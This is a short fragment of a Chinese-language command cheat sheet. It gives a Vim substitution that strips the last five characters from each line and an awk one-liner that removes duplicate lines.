移除文件后5个字符
:%s/.\{5}$//
(2)AWK
删除重复行
awk '!seen[$0]++' file